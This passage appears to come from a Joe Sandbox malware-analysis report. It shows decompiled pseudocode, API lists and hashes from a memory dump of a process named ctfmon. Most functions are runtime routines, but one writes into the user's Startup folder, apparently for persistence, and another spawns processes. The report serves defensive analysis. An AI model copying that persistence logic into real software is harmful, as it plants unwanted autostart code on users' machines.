                                                				char _t74;
                                                				signed char _t75;
                                                				signed int _t76;
                                                				signed char _t86;
                                                				char _t87;
                                                				char _t90;
                                                				signed int _t93;
                                                				signed int _t94;
                                                				signed int _t95;
                                                				void* _t96;
                                                				char* _t97;
                                                				intOrPtr _t100;
                                                				signed int _t101;
                                                
                                                				_t95 = __edx;
                                                				_t63 =  *0x98f008; // 0x35554c2f
                                                				_v8 = _t63 ^ _t101;
                                                				_t100 = _a4;
                                                				_t4 = _t100 + 4; // 0x5efc4d8b
                                                				if(GetCPInfo( *_t4,  &_v1820) == 0) {
                                                					_t47 = _t100 + 0x119; // 0x97afc7
                                                					_t96 = _t47;
                                                					_t90 = 0;
                                                					_t67 = 0xffffff9f;
                                                					_t68 = _t67 - _t96;
                                                					__eflags = _t68;
                                                					_v1828 = _t68;
                                                					do {
                                                						_t97 = _t96 + _t90;
                                                						_t69 = _t68 + _t97;
                                                						_v1824 = _t69;
                                                						__eflags = _t69 + 0x20 - 0x19;
                                                						if(_t69 + 0x20 > 0x19) {
                                                							__eflags = _v1824 - 0x19;
                                                							if(_v1824 > 0x19) {
                                                								 *_t97 = 0;
                                                							} else {
                                                								_t72 = _t100 + _t90;
                                                								_t57 = _t72 + 0x19;
                                                								 *_t57 =  *(_t72 + 0x19) | 0x00000020;
                                                								__eflags =  *_t57;
                                                								_t59 = _t90 - 0x20; // -32
                                                								_t73 = _t59;
                                                								goto L24;
                                                							}
                                                						} else {
                                                							 *(_t100 + _t90 + 0x19) =  *(_t100 + _t90 + 0x19) | 0x00000010;
                                                							_t54 = _t90 + 0x20; // 0x20
                                                							_t73 = _t54;
                                                							L24:
                                                							 *_t97 = _t73;
                                                						}
                                                						_t68 = _v1828;
                                                						_t61 = _t100 + 0x119; // 0x97afc7
                                                						_t96 = _t61;
                                                						_t90 = _t90 + 1;
                                                						__eflags = _t90 - 0x100;
                                                					} while (_t90 < 0x100);
                                                				} else {
                                                					_t74 = 0;
                                                					do {
                                                						 *((char*)(_t101 + _t74 - 0x104)) = _t74;
                                                						_t74 = _t74 + 1;
                                                					} while (_t74 < 0x100);
                                                					_t75 = _v1814;
                                                					_t93 =  &_v1814;
                                                					_v264 = 0x20;
                                                					while(1) {
                                                						_t107 = _t75;
                                                						if(_t75 == 0) {
                                                							break;
                                                						}
                                                						_t95 =  *(_t93 + 1) & 0x000000ff;
                                                						_t76 = _t75 & 0x000000ff;
                                                						while(1) {
                                                							__eflags = _t76 - _t95;
                                                							if(_t76 > _t95) {
                                                								break;
                                                							}
                                                							__eflags = _t76 - 0x100;
                                                							if(_t76 < 0x100) {
                                                								 *((char*)(_t101 + _t76 - 0x104)) = 0x20;
                                                								_t76 = _t76 + 1;
                                                								__eflags = _t76;
                                                								continue;
                                                							}
                                                							break;
                                                						}
                                                						_t93 = _t93 + 2;
                                                						__eflags = _t93;
                                                						_t75 =  *_t93;
                                                					}
                                                					_t13 = _t100 + 4; // 0x5efc4d8b
                                                					E0097C425(0, _t95, 0x100, _t107, 0, 1,  &_v264, 0x100,  &_v1800,  *_t13, 0);
                                                					_t16 = _t100 + 4; // 0x5efc4d8b
                                                					_t19 = _t100 + 0x21c; // 0x75009962
                                                					E0097A62C(0x100, _t107, 0,  *_t19, 0x100,  &_v264, 0x100,  &_v520, 0x100,  *_t16, 0);
                                                					_t21 = _t100 + 4; // 0x5efc4d8b
                                                					_t23 = _t100 + 0x21c; // 0x75009962
                                                					E0097A62C(0x100, _t107, 0,  *_t23, 0x200,  &_v264, 0x100,  &_v776, 0x100,  *_t21, 0);
                                                					_t94 = 0;
                                                					do {
                                                						_t86 =  *(_t101 + _t94 * 2 - 0x704) & 0x0000ffff;
                                                						if((_t86 & 0x00000001) == 0) {
                                                							__eflags = _t86 & 0x00000002;
                                                							if((_t86 & 0x00000002) == 0) {
                                                								 *((char*)(_t100 + _t94 + 0x119)) = 0;
                                                							} else {
                                                								_t37 = _t100 + _t94 + 0x19;
                                                								 *_t37 =  *(_t100 + _t94 + 0x19) | 0x00000020;
                                                								__eflags =  *_t37;
                                                								_t87 =  *((intOrPtr*)(_t101 + _t94 - 0x304));
                                                								goto L15;
                                                							}
                                                						} else {
                                                							 *(_t100 + _t94 + 0x19) =  *(_t100 + _t94 + 0x19) | 0x00000010;
                                                							_t87 =  *((intOrPtr*)(_t101 + _t94 - 0x204));
                                                							L15:
                                                							 *((char*)(_t100 + _t94 + 0x119)) = _t87;
                                                						}
                                                						_t94 = _t94 + 1;
                                                					} while (_t94 < 0x100);
                                                				}
                                                				return E00970A5D(_v8 ^ _t101, _t100);
                                                			}


                                                APIs
                                                • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0097A9A1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: Info
                                                • String ID: $/LU5/
                                                • API String ID: 1807457897-1059646758
                                                • Opcode ID: 065f83a755754bf18edc281e0a7df4273529c04731a3cd5d1d244ebb14e962b6
                                                • Instruction ID: 06544f38557d8bb14f87c8e3ded85d9b3b3c5a0aa293591b1200a06fc8b346e2
                                                • Opcode Fuzzy Hash: 065f83a755754bf18edc281e0a7df4273529c04731a3cd5d1d244ebb14e962b6
                                                • Instruction Fuzzy Hash: EB415B725083489EDF258E248D84BFEBBEEEB85304F1444EDE58E86142E2359E45DF61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 97%
                                                			E00969B40(void* __ecx, intOrPtr __edx) {
                                                				signed int _v8;
                                                				intOrPtr _v12;
                                                				intOrPtr _v16;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t47;
                                                				intOrPtr _t48;
                                                				char _t50;
                                                				intOrPtr _t54;
                                                				void* _t55;
                                                				intOrPtr _t57;
                                                				char _t59;
                                                				intOrPtr _t63;
                                                				void* _t64;
                                                				void* _t66;
                                                				intOrPtr _t67;
                                                				intOrPtr* _t69;
                                                				void* _t73;
                                                				intOrPtr* _t76;
                                                				void* _t80;
                                                				void* _t84;
                                                				void* _t85;
                                                				intOrPtr* _t86;
                                                				intOrPtr* _t87;
                                                				signed int _t88;
                                                				intOrPtr _t89;
                                                				signed int _t90;
                                                				intOrPtr _t91;
                                                				void* _t92;
                                                
                                                				_t47 = 0;
                                                				_v12 = __edx;
                                                				_t66 = __ecx;
                                                				_v8 = 0;
                                                				asm("o16 nop [eax+eax]");
                                                				while(1) {
                                                					_t3 = _t47 + 0x994e80; // 0x994e80
                                                					_t86 = _t3;
                                                					if(_t86 == 0) {
                                                						break;
                                                					} else {
                                                						_t76 = _t86;
                                                						_t4 = _t76 + 1; // 0x994e81
                                                						_t85 = _t4;
                                                						goto L3;
                                                					}
                                                					do {
                                                						L3:
                                                						_t57 =  *_t76;
                                                						_t76 = _t76 + 1;
                                                					} while (_t57 != 0);
                                                					if(_t76 == _t85) {
                                                						break;
                                                					}
                                                					_t90 = 0;
                                                					if( *(_t66 + 0x20) <= 0) {
                                                						L10:
                                                						_t91 = E00970A6E(_t90, _t99, 0x100);
                                                						_t92 = _t92 + 4;
                                                						_v16 = _t91;
                                                						_t80 = _t91 - _v8 - 0x994e80;
                                                						do {
                                                							_t59 =  *_t86;
                                                							_t86 = _t86 + 1;
                                                							 *((char*)(_t80 + _t86 - 1)) = _t59;
                                                						} while (_t59 != 0);
                                                						if(E00966F70(_t66) != 0) {
                                                							_t16 = _t66 + 0x20; // 0x4d005c
                                                							_t17 = _t66 + 0x1c; // 0x610074
                                                							 *((intOrPtr*)( *_t17 +  *_t16 * 4)) = _t91;
                                                							 *(_t66 + 0x20) =  *(_t66 + 0x20) + 1;
                                                						}
                                                						L14:
                                                						_t47 = _v8 - 0xffffff80;
                                                						_v8 = _t47;
                                                						if(_t47 < 0x600) {
                                                							continue;
                                                						}
                                                						break;
                                                					} else {
                                                						goto L6;
                                                					}
                                                					while(1) {
                                                						L6:
                                                						_t63 = 0;
                                                						_t6 = _t66 + 0x20; // 0x4d005c
                                                						if(_t90 <  *_t6) {
                                                							_t7 = _t66 + 0x1c; // 0x610074
                                                							_t63 =  *((intOrPtr*)( *_t7 + _t90 * 4));
                                                						}
                                                						_t64 = E00977612(_t86, _t90, _t63, _t86);
                                                						_t92 = _t92 + 8;
                                                						if(_t64 == 0) {
                                                							goto L14;
                                                						}
                                                						_t90 = _t90 + 1;
                                                						_t10 = _t66 + 0x20; // 0x4d005c
                                                						_t99 = _t90 -  *_t10;
                                                						if(_t90 <  *_t10) {
                                                							continue;
                                                						}
                                                						goto L10;
                                                					}
                                                					goto L14;
                                                				}
                                                				_t67 = _v12;
                                                				_t48 = 0;
                                                				_v8 = 0;
                                                				asm("o16 nop [eax+eax]");
                                                				while(1) {
                                                					_t26 = _t48 + "123"; // 0x990e80
                                                					_t87 = _t26;
                                                					if(_t87 == 0) {
                                                						break;
                                                					}
                                                					_t69 = _t87;
                                                					_t27 = _t69 + 1; // 0x990e81
                                                					_t84 = _t27;
                                                					do {
                                                						_t48 =  *_t69;
                                                						_t69 = _t69 + 1;
                                                					} while (_t48 != 0);
                                                					if(_t69 == _t84) {
                                                						break;
                                                					}
                                                					_t88 = 0;
                                                					if( *(_t67 + 0x20) <= 0) {
                                                						L25:
                                                						_t89 = E00970A6E(_t88, _t111, 0x100);
                                                						_t92 = _t92 + 4;
                                                						_v16 = _t89;
                                                						_t73 = _t89 - _v8 - "123";
                                                						do {
                                                							_t50 =  *_t87;
                                                							_t36 = _t87 + 1; // 0x3332
                                                							_t87 = _t36;
                                                							 *((char*)(_t73 + _t87 - 1)) = _t50;
                                                						} while (_t50 != 0);
                                                						if(E00966F70(_t67) != 0) {
                                                							 *((intOrPtr*)( *((intOrPtr*)(_t67 + 0x1c)) +  *(_t67 + 0x20) * 4)) = _t89;
                                                							 *(_t67 + 0x20) =  *(_t67 + 0x20) + 1;
                                                						}
                                                						L29:
                                                						_t48 = _v8 - 0xffffff80;
                                                						_v8 = _t48;
                                                						if(_t48 < 0x4000) {
                                                							continue;
                                                						}
                                                						break;
                                                					} else {
                                                						goto L21;
                                                					}
                                                					while(1) {
                                                						L21:
                                                						_t54 = 0;
                                                						if(_t88 <  *(_t67 + 0x20)) {
                                                							_t54 =  *((intOrPtr*)( *((intOrPtr*)(_t67 + 0x1c)) + _t88 * 4));
                                                						}
                                                						_t55 = E00977612(_t87, _t88, _t54, _t87);
                                                						_t92 = _t92 + 8;
                                                						if(_t55 == 0) {
                                                							goto L29;
                                                						}
                                                						_t88 = _t88 + 1;
                                                						_t111 = _t88 -  *(_t67 + 0x20);
                                                						if(_t88 <  *(_t67 + 0x20)) {
                                                							continue;
                                                						}
                                                						goto L25;
                                                					}
                                                					goto L29;
                                                				}
                                                				return _t48;
                                                			}


                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 123
                                                • API String ID: 0-2286445522
                                                • Opcode ID: 31f67348ef967b9dc3e7fde903b058c7bcee3be9f03606870bfe7a0fbb18c808
                                                • Instruction ID: 75d1465f280148efca46cbe10c06d21ea68a55ef5be09e0df8065ac2eddc718c
                                                • Opcode Fuzzy Hash: 31f67348ef967b9dc3e7fde903b058c7bcee3be9f03606870bfe7a0fbb18c808
                                                • Instruction Fuzzy Hash: 7241F571904205DFCF14DF78A084AA9B7B9FF89304B1646E9DC89AF34AD635E902CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 81%
                                                			E0097D4B7(void* __ebx, void* __edi, intOrPtr* _a4, signed int _a8, signed short* _a12, intOrPtr _a16) {
                                                				signed int _v8;
                                                				char _v10;
                                                				void _v5128;
                                                				intOrPtr _v5132;
                                                				long _v5136;
                                                				void* _v5140;
                                                				void* __esi;
                                                				signed int _t29;
                                                				intOrPtr _t35;
                                                				long _t43;
                                                				signed int _t44;
                                                				signed short* _t47;
                                                				signed int _t49;
                                                				signed int _t51;
                                                				void* _t52;
                                                				signed int _t56;
                                                				signed int* _t58;
                                                				long _t60;
                                                				intOrPtr* _t63;
                                                				void* _t64;
                                                				signed int _t65;
                                                
                                                				E00983CA0();
                                                				_t29 =  *0x98f008; // 0x35554c2f
                                                				_v8 = _t29 ^ _t65;
                                                				_t49 = _a8;
                                                				_t51 = (_t49 & 0x0000003f) * 0x30;
                                                				_t47 = _a12;
                                                				_t63 = _a4;
                                                				_t8 = _t51 + 0x18; // 0xcccccccc
                                                				_t52 =  *( *((intOrPtr*)(0x996480 + (_t49 >> 6) * 4)) + _t8);
                                                				_t35 = _a16 + _t47;
                                                				_v5140 = _t52;
                                                				_v5132 = _t35;
                                                				 *_t63 = 0;
                                                				 *((intOrPtr*)(_t63 + 4)) = 0;
                                                				 *((intOrPtr*)(_t63 + 8)) = 0;
                                                				while(_t47 < _t35) {
                                                					_t58 =  &_v5128;
                                                					while(_t47 < _t35) {
                                                						_t44 =  *_t47 & 0x0000ffff;
                                                						_t47 =  &(_t47[1]);
                                                						if(_t44 == 0xa) {
                                                							 *((intOrPtr*)(_t63 + 8)) =  *((intOrPtr*)(_t63 + 8)) + 2;
                                                							_t56 = 0xd;
                                                							 *_t58 = _t56;
                                                							_t58 =  &(_t58[0]);
                                                						}
                                                						 *_t58 = _t44;
                                                						_t58 =  &(_t58[0]);
                                                						_t35 = _v5132;
                                                						if(_t58 <  &_v10) {
                                                							continue;
                                                						}
                                                						break;
                                                					}
                                                					_t60 = _t58 -  &_v5128 & 0xfffffffe;
                                                					if(WriteFile(_t52,  &_v5128, _t60,  &_v5136, 0) == 0) {
                                                						 *_t63 = GetLastError();
                                                					} else {
                                                						_t43 = _v5136;
                                                						 *((intOrPtr*)(_t63 + 4)) =  *((intOrPtr*)(_t63 + 4)) + _t43;
                                                						if(_t43 >= _t60) {
                                                							_t35 = _v5132;
                                                							_t52 = _v5140;
                                                							continue;
                                                						}
                                                					}
                                                					L12:
                                                					_pop(_t64);
                                                					return E00970A5D(_v8 ^ _t65, _t64);
                                                				}
                                                				goto L12;
                                                 			}

                                                APIs
                                                • WriteFile.KERNEL32(CCCCCCCC,?,?,?,00000000,00000010,0096971E,08A10000,?,0097D8F4,00000000,0096971E,00000010,0096971E,0096971E,?), ref: 0097D561
                                                • GetLastError.KERNEL32(?,0097D8F4,00000000,0096971E,00000010,0096971E,0096971E,?,0096971E,?,00975E64,0096971E,?,00000000,?,00975EFD), ref: 0097D58A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: ErrorFileLastWrite
                                                • String ID: /LU5/
                                                • API String ID: 442123175-937868281
                                                • Opcode ID: 6fca900884882141ed7e9e5fd7443abd8bb4ae69bbbe11c0ca36cca86567df10
                                                • Instruction ID: 61b2ac25ef6b9fe3eb407ca0b3dedb8a37149796c081d01fe58c9a8a06a50dac
                                                • Opcode Fuzzy Hash: 6fca900884882141ed7e9e5fd7443abd8bb4ae69bbbe11c0ca36cca86567df10
                                                • Instruction Fuzzy Hash: D9317172A112199BCB24CF69CC80A99B3F9FF88314B1084AAE51DD7250E630AD858F54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 81%
                                                			E0097D3D8(void* __ebx, void* __edi, signed int* _a4, signed int _a8, intOrPtr* _a12, intOrPtr _a16) {
                                                				signed int _v8;
                                                				char _v9;
                                                				void _v5128;
                                                				intOrPtr _v5132;
                                                				long _v5136;
                                                				void* _v5140;
                                                				void* __esi;
                                                				signed int _t31;
                                                				intOrPtr _t37;
                                                				long _t45;
                                                				char _t46;
                                                				intOrPtr* _t49;
                                                				signed int _t51;
                                                				signed int _t53;
                                                				void* _t54;
                                                				char* _t58;
                                                				long _t59;
                                                				signed int* _t62;
                                                				void* _t63;
                                                				signed int _t64;
                                                
                                                				E00983CA0();
                                                				_t31 =  *0x98f008; // 0x35554c2f
                                                				_v8 = _t31 ^ _t64;
                                                				_t51 = _a8;
                                                				_t53 = (_t51 & 0x0000003f) * 0x30;
                                                				_t49 = _a12;
                                                				_t62 = _a4;
                                                				_t8 = _t53 + 0x18; // 0xcccccccc
                                                				_t54 =  *( *((intOrPtr*)(0x996480 + (_t51 >> 6) * 4)) + _t8);
                                                				 *_t62 =  *_t62 & 0x00000000;
                                                				_t37 = _a16 + _t49;
                                                				_t62[1] = _t62[1] & 0x00000000;
                                                				_t62[2] = _t62[2] & 0x00000000;
                                                				_v5140 = _t54;
                                                				_v5132 = _t37;
                                                				while(_t49 < _t37) {
                                                					_t58 =  &_v5128;
                                                					while(_t49 < _t37) {
                                                						_t46 =  *_t49;
                                                						_t49 = _t49 + 1;
                                                						if(_t46 == 0xa) {
                                                							_t62[2] = _t62[2] + 1;
                                                							 *_t58 = 0xd;
                                                							_t58 = _t58 + 1;
                                                						}
                                                						 *_t58 = _t46;
                                                						_t58 = _t58 + 1;
                                                						_t37 = _v5132;
                                                						if(_t58 <  &_v9) {
                                                							continue;
                                                						}
                                                						break;
                                                					}
                                                					_t59 = _t58 -  &_v5128;
                                                					if(WriteFile(_t54,  &_v5128, _t59,  &_v5136, 0) == 0) {
                                                						 *_t62 = GetLastError();
                                                					} else {
                                                						_t45 = _v5136;
                                                						_t62[1] = _t62[1] + _t45;
                                                						if(_t45 >= _t59) {
                                                							_t37 = _v5132;
                                                							_t54 = _v5140;
                                                							continue;
                                                						}
                                                					}
                                                					L12:
                                                					_pop(_t63);
                                                					return E00970A5D(_v8 ^ _t64, _t63);
                                                				}
                                                				goto L12;
                                                 			}

                                                APIs
                                                • WriteFile.KERNEL32(CCCCCCCC,?,?,?,00000000,00000010,0096971E,08A10000,?,0097D914,00000000,0096971E,00000010,0096971E,0096971E,?), ref: 0097D473
                                                • GetLastError.KERNEL32(?,0097D914,00000000,0096971E,00000010,0096971E,0096971E,?,0096971E,?,00975E64,0096971E,?,00000000,?,00975EFD), ref: 0097D49C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: ErrorFileLastWrite
                                                • String ID: /LU5/
                                                • API String ID: 442123175-937868281
                                                • Opcode ID: 62b5f8c69efecdbaed32b8fffb6b0f204d04ce94b3a907cc0e98e30f45487b23
                                                • Instruction ID: d26e7d256f9ba4f33aa68c728292aeead7741a9ae502f9995c319c7bb1802fbb
                                                • Opcode Fuzzy Hash: 62b5f8c69efecdbaed32b8fffb6b0f204d04ce94b3a907cc0e98e30f45487b23
                                                • Instruction Fuzzy Hash: DA218076A102199FCB14CF69C880BE9B3F9FF48351F1044AAE54ED72A1D630AD85CF20
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 90%
                                                			E00977C42(signed int _a4, CHAR* _a8, intOrPtr* _a12, intOrPtr _a16) {
                                                				struct HINSTANCE__* _t13;
                                                				signed int* _t20;
                                                				signed int _t27;
                                                				signed int _t28;
                                                				signed int _t29;
                                                				signed int _t33;
                                                				intOrPtr* _t34;
                                                
                                                				_t20 = 0x9963f8 + _a4 * 4;
                                                				_t27 =  *0x98f008; // 0x35554c2f
                                                				_t29 = _t28 | 0xffffffff;
                                                				_t33 = _t27 ^  *_t20;
                                                				asm("ror esi, cl");
                                                				if(_t33 == _t29) {
                                                					L14:
                                                					return 0;
                                                				}
                                                				if(_t33 == 0) {
                                                					_t34 = _a12;
                                                					if(_t34 == _a16) {
                                                						L7:
                                                						_t13 = 0;
                                                						L8:
                                                						if(_t13 == 0) {
                                                							L13:
                                                							_push(0x20);
                                                							asm("ror edi, cl");
                                                							 *_t20 = _t29 ^ _t27;
                                                							goto L14;
                                                						}
                                                						_t33 = GetProcAddress(_t13, _a8);
                                                						if(_t33 == 0) {
                                                							_t27 =  *0x98f008; // 0x35554c2f
                                                							goto L13;
                                                						}
                                                						 *_t20 = E00970ABD(_t33);
                                                						goto L2;
                                                					} else {
                                                						goto L4;
                                                					}
                                                					while(1) {
                                                						L4:
                                                						_t13 = E00977CDE( *_t34);
                                                						if(_t13 != 0) {
                                                							break;
                                                						}
                                                						_t34 = _t34 + 4;
                                                						if(_t34 != _a16) {
                                                							continue;
                                                						}
                                                						_t27 =  *0x98f008; // 0x35554c2f
                                                						goto L7;
                                                					}
                                                					_t27 =  *0x98f008; // 0x35554c2f
                                                					goto L8;
                                                				}
                                                				L2:
                                                				return _t33;
                                                 			}

                                                APIs
                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00977CA2
                                                • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00977CAF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: AddressProc__crt_fast_encode_pointer
                                                • String ID: /LU5/
                                                • API String ID: 2279764990-937868281
                                                • Opcode ID: 9f14a1a6d156341b9adf309fb7fae99643521dcfe8cd67d61c943bb16741883d
                                                • Instruction ID: d9f311b70efccbc98b92c6d8a4038da2db12c3c8c2e2e65dff3bb296c9e12bed
                                                • Opcode Fuzzy Hash: 9f14a1a6d156341b9adf309fb7fae99643521dcfe8cd67d61c943bb16741883d
                                                • Instruction Fuzzy Hash: 47110D336186219F9B279E9CDC5056AB3D5FBC836072A8120FC9CEB354DA30DC0197D0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 42%
                                                			E00970A5D(void* __ecx, void* __esi, intOrPtr _a4) {
                                                				void* __ebp;
                                                				void* _t4;
                                                				void* _t5;
                                                				void* _t9;
                                                
                                                				_t8 = __ecx;
                                                				asm("repne jnz 0x5");
                                                				asm("repne ret");
                                                				asm("repne jmp 0x32d");
                                                				while(1) {
                                                					_push(_a4);
                                                					_t4 = E00975A3B(_t8); // executed
                                                					_pop(_t9);
                                                					if(_t4 != 0) {
                                                						break;
                                                					}
                                                					_t5 = E00976248(_t9, __eflags, _a4);
                                                					_pop(_t8);
                                                					__eflags = _t5;
                                                					if(_t5 == 0) {
                                                						__eflags = _a4 - 0xffffffff;
                                                						if(__eflags != 0) {
                                                							E00971283(__eflags);
                                                						} else {
                                                							E009712A0(__eflags);
                                                						}
                                                					}
                                                				}
                                                				return _t4;
                                                 			}

                                                APIs
                                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00970DA0
                                                • ___raise_securityfailure.LIBCMT ref: 00970E87
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: FeaturePresentProcessor___raise_securityfailure
                                                • String ID: /LU5/
                                                • API String ID: 3761405300-937868281
                                                • Opcode ID: 0ef9f455db5b259f0415f1fb0ae63d5e056c1af430dc2d481741f93ba0c8d657
                                                • Instruction ID: 2389d54107745c84593489831f4742fe2586e46532436f727dd689757a380627
                                                • Opcode Fuzzy Hash: 0ef9f455db5b259f0415f1fb0ae63d5e056c1af430dc2d481741f93ba0c8d657
                                                • Instruction Fuzzy Hash: EB21E6B5539B00DBD712CF5DF99971637E4BB4C320F52502BE908CA3A1D3B55980EB54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 33%
                                                			E0096A970(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                				signed int _v8;
                                                				char _v530;
                                                				void _v532;
                                                				short _v2580;
                                                				char _v2584;
                                                				intOrPtr _v2588;
                                                				intOrPtr _v2592;
                                                				void* __esi;
                                                				signed int _t19;
                                                				void* _t26;
                                                				void* _t35;
                                                				void* _t45;
                                                				signed int _t46;
                                                				void* _t47;
                                                
                                                				_t42 = __edi;
                                                				_t19 =  *0x98f008; // 0x35554c2f
                                                				_v8 = _t19 ^ _t46;
                                                				_v2592 = _a4;
                                                				_t35 = L"AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup";
                                                				_v2588 = _a8;
                                                				_v2584 = 3;
                                                				asm("o16 nop [eax+eax]");
                                                				do {
                                                					E00973440(_t42,  &_v530, 0, 0x206);
                                                					_t45 = _t35;
                                                					_t26 = memcpy( &_v532, _t45, 0x40 << 2);
                                                					_t42 = _t45 + 0x80;
                                                					E00973440(_t45 + 0x80, _t26, 0, 0x800);
                                                					wsprintfW( &_v2580, L"%ws\\%ws", _v2588,  &_v532);
                                                					_t47 = _t47 + 0x34;
                                                					E0096A760(_t35,  &_v2580, _v2592, _t45 + 0x80);
                                                					_t35 = _t35 + 0x100;
                                                					_t16 =  &_v2584;
                                                					 *_t16 = _v2584 - 1;
                                                				} while ( *_t16 != 0);
                                                				return E00970A5D(_v8 ^ _t46, _t45);
                                                			}


















                                                APIs
                                                • wsprintfW.USER32 ref: 0096A9FE
                                                  • Part of subcall function 0096A760: GetFileAttributesW.KERNEL32(?,?,00995480,00995480,?,0096AA18), ref: 0096A786
                                                  • Part of subcall function 0096A760: wsprintfW.USER32 ref: 0096A801
                                                  • Part of subcall function 0096A760: wsprintfW.USER32 ref: 0096A84F
                                                  • Part of subcall function 0096A760: GetLocalTime.KERNEL32(?), ref: 0096A893
                                                  • Part of subcall function 0096A760: wsprintfW.USER32 ref: 0096A8C3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: wsprintf$AttributesFileLocalTime
                                                • String ID: %ws\%ws$/LU5/
                                                • API String ID: 1715372494-3952417340
                                                • Opcode ID: fa3808754fce899250b068aa852870ee797e3fd30fc06964458f8d4b21dbe719
                                                • Instruction ID: e952af01d837daf7944f470fa161b52a2c37571044552807b5fa53df4ffc8b85
                                                • Opcode Fuzzy Hash: fa3808754fce899250b068aa852870ee797e3fd30fc06964458f8d4b21dbe719
                                                • Instruction Fuzzy Hash: 95114F72A4031CABDB20DF58CC85BDAB3B8BB49314F0044E9A91DB7641DA745F848F92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 77%
                                                			E0096A330(WCHAR* __ecx) {
                                                				struct _PROCESS_INFORMATION _v24;
                                                				struct _STARTUPINFOW _v96;
                                                				void* _t19;
                                                				WCHAR* _t20;
                                                
                                                				_t20 = __ecx;
                                                				E00973440(_t19,  &_v96, 0, 0x44);
                                                				_v96.cb = 0x44;
                                                				_v96.dwFlags = 1;
                                                				_v96.wShowWindow = 5;
                                                				asm("xorps xmm0, xmm0");
                                                				asm("movups [ebp-0x14], xmm0");
                                                				if(CreateProcessW(0, _t20, 0, 0, 0, 0x8000000, 0, 0,  &_v96,  &_v24) == 0) {
                                                					return 0;
                                                				} else {
                                                					WaitForSingleObject(_v24, 0);
                                                					return 1;
                                                				}
                                                			}








                                                APIs
                                                • CreateProcessW.KERNEL32 ref: 0096A384
                                                • WaitForSingleObject.KERNEL32(?,00000000,?,745EC0B0), ref: 0096A393
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: CreateObjectProcessSingleWait
                                                • String ID: D
                                                • API String ID: 623904672-2746444292
                                                • Opcode ID: 0ce9128996d46991623185ab108fd881bc115b835ef3771194f9b451cfdae1b0
                                                • Instruction ID: 2827c203eb39fc51eebb684954b707062cb297824d7dacc19852981b2cb9a371
                                                • Opcode Fuzzy Hash: 0ce9128996d46991623185ab108fd881bc115b835ef3771194f9b451cfdae1b0
                                                • Instruction Fuzzy Hash: 8801FE32E8020C7AEB10DF95DC47FDFB76CEB04704F208116FA187A2C0E6B269148BA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 28%
                                                			E00977FD8(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
                                                				signed int _v8;
                                                				void* __esi;
                                                				signed int _t18;
                                                				intOrPtr* _t31;
                                                				void* _t32;
                                                				signed int _t33;
                                                
                                                				_t26 = __ecx;
                                                				_push(__ecx);
                                                				_t18 =  *0x98f008; // 0x35554c2f
                                                				_v8 = _t18 ^ _t33;
                                                				_t31 = E00977C42(0x16, "LCMapStringEx", 0x9867b0, "LCMapStringEx");
                                                				if(_t31 == 0) {
                                                					LCMapStringW(E00978060(_t26, __eflags, _a4, 0), _a8, _a12, _a16, _a20, _a24);
                                                				} else {
